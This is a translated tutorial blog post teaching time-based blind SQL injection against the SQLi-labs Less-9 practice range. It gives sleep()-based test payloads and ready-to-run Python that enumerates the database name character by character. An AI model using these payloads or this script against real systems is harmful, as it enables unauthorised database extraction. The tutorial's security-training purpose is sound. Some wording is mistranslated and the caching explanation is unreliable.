"Author's Homepage": Shibie Sanshi wyx
"Author's Profile": CSDN top100, Alibaba Cloud blog expert, Huawei cloud expert, high-quality creator in the field of network security
"Column Introduction": This article has been entered in the column "Network Security Quick Start"
time blind
1. What is the time blind?
Time-blind injection refers to time-based blind injection, also known as delayed injection. It is judged whether there is injection according to the response time of the page.
2. Usage scenarios
The priority of time blind injection is not high, and it is usually considered when joint injection, error injection, and Boolean blind injection cannot be used:
- The page has no echo location (joint injection does not work)
- The page does not display the error message of the database (error injection cannot be used)
- The page responds with only one result, whether it succeeds or fails (boolean blinds cannot be used)
3. Use steps
Time blinds are used in the same way as Boolean blinds, and can be divided into three steps.
Step 1: Determine the injection point
Try the following types of test payloads in turn, if the delay is more than 5 seconds, the judgment is true, that is, there is injection
?id=1 and if(1,sleep(5),3) -- a
?id=1' and if(1,sleep(5),3) -- a
?id=1" and if(1,sleep(5),3) -- a
括号及各种过滤类型……
Tip: The sleep time can be customized. If the time is too long, the efficiency is too low, and if the time is too short, it is not easy to judge.
Step 2: Determine the length
Use MySQL's if() and sleep() to judge the length of the query result, starting from 1 and increasing in turn.
?id=1' and if((length(查询语句) =1), sleep(5), 3) -- a
If the page response time exceeds 5 seconds, the length judgment is correct (sleep(5));
if the page response time does not exceed 5 seconds (normal response), the length judgment is wrong, and the judgment length continues to increase.
Step 3: Enumerate Characters
Use MySQL's if() and sleep() to judge the content of characters.
Intercept the first character from the query result, convert it into ASCLL code, judge from 32, and increase to 126.
For ASCLL code, please refer to my other article: ASCLL code comparison table
?id=1' and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3) -- a
If the page response time exceeds 5 seconds, it means that the character content is judged correctly;
if the page response time does not exceed 5 seconds (normal response), it means that the character content is judged incorrectly, and other possibilities for guessing the character are increased.
After the first character is successfully guessed, guess the second, the third...the nth one in turn (n represents the length of the returned result).
4. Disadvantages of Time Blind Betting
- The time complexity of time blind injection is high, and it needs to consume a lot of time.
- Time blinds are easily affected by factors such as network fluctuations, resulting in errors.
Time blind injection has large error and high time cost. Usually, it is enough to prove the existence of injection.
5. Blind script
Time-blind annotation usually uses scripts to automatically guess the solution. The Python script is as follows, which can be modified as needed:
import requests
import time
# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload
# 目标网址(不带参数)
url = "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/"
# 猜解长度使用的payload
payload_len = """?id=1' and if(
(length(database()) ={n})
,sleep(5),3) -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and if(
(ascii(
substr(
(database())
,{n},1)
) ={r})
, sleep(5), 3) -- a"""
# 获取长度
def getLength(url, payload):
length = 1 # 初始测试长度为1
while True:
start_time = time.time()
response = requests.get(url= url+payload_len.format(n= length))
# 页面响应时间 = 结束执行的时间 - 开始执行的时间
use_time = time.time() - start_time
# 响应时间>5秒时,表示猜解成功
if use_time > 5:
print('测试长度完成,长度为:', length,)
return length;
else:
print('正在测试长度:',length)
length += 1 # 测试长度递增
# 获取字符
def getStr(url, payload, length):
str = '' # 初始表名/库名为空
# 第一层循环,截取每一个字符
for l in range(1, length+1):
# 第二层循环,枚举截取字符的每一种可能性
for n in range(33, 126):
start_time = time.time()
response = requests.get(url= url+payload_str.format(n= l, r= n))
# 页面响应时间 = 结束执行的时间 - 开始执行的时间
use_time = time.time() - start_time
# 页面中出现此内容则表示成功
if use_time > 5:
str+= chr(n)
print('第', l, '个字符猜解成功:', str)
break;
return str;
# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)
6. Practical ideas
Test Range: SQLi LABS Less 9
Injection: Single Quote Character Injection
1. Determine whether there is a time blind injection
After the injection point is determined, it is necessary to determine whether there is a time blind injection on the webpage. When the following two conditions are met at the same time, it can be determined that there is a time blind injection:
?id=1' and if(1, sleep(5), 3) -- a 延时5秒响应
?id=1' and if(0,sleep(5),3) -- a 正常响应
Principle analysis
The first parameter of the if() function is a conditional expression, 1 will be converted to True and 0 will be converted to False.
When the result of the conditional expression is True, the code at the second parameter position, namely sleep(5), will be executed, delaying the response for 5 seconds;
when the result of the conditional expression is False, the code at the third parameter position will be executed, namely 3 , a custom placeholder, meaningless, the page responds normally.
2. Destocking
After it is determined that the time-blind injection exists, the library can be removed.
Removing the library is divided into two steps: judging the length, enumerating characters
2.1 Judging the length of the returned result
Let's take the example of judging the length of the currently used database name, first judge whether the length is greater than 1.
?id=1' and if(
(length(database()) >1)
,sleep(5),3) -- a
Principle analysis
The payload is spliced into SQL, and the execution process is as follows:
The length of the library name must be greater than 1. If the page response time is greater than 5 seconds, it means that the payload is available. Start from 1 to test the length and increase sequentially:
2.2 Enumeration characters
There are 95 characters available for the library name, such as upper and lower case letters, numbers, underscores and other special characters.
We intercept the first character and exhaustively enumerate these 95 possibilities. In order to facilitate guessing, we convert the character to ASCLL code and then judge (the ASCLL corresponding to the character is 32~126).
First determine whether the ASCLL code of the first character of the currently used database name is greater than 1:
?id=1' and if(
(ascii(
substr(
(database())
,1,1)
) >1)
, sleep(5), 3) -- a
Principle analysis
The payload is spliced into SQL, and the execution process is as follows:
the ASCLL code of the first character must be greater than 1, and the page responds for more than 5 seconds, indicating that the payload is available.
Judging from 32 to 126 in turn, if the page responds for more than 5 seconds, the guess is correct; if the page responds normally, the guess is wrong.
After successfully guessing the first character, guess the second, third...nth characters in turn (n represents the length of the returned result).
7. Error judgment
For the same payload, if the first response time is long, but the second response time is short, it means that it is affected by network fluctuations. If both response times are very long, the delay is successful.
Principle: The database will put the executed SQL statements and execution results in the cache to reduce the access pressure of the database. When the database executes SQL, it will first look for the cache. If the same SQL exists in the cache, it will directly return the query results in the cache without searching the database.
This means that when the same SQL is executed for the first time, it will consume a lot of time (checking the database); when it is executed the second time, it will consume almost no time (checking the cache).
Recommended column
"Network Security Quick Start" uses the shortest time to master the core network security technology.
"Shooting Range Clearance Tutorial" The customs clearance tutorials of various shooting ranges are continuously updated...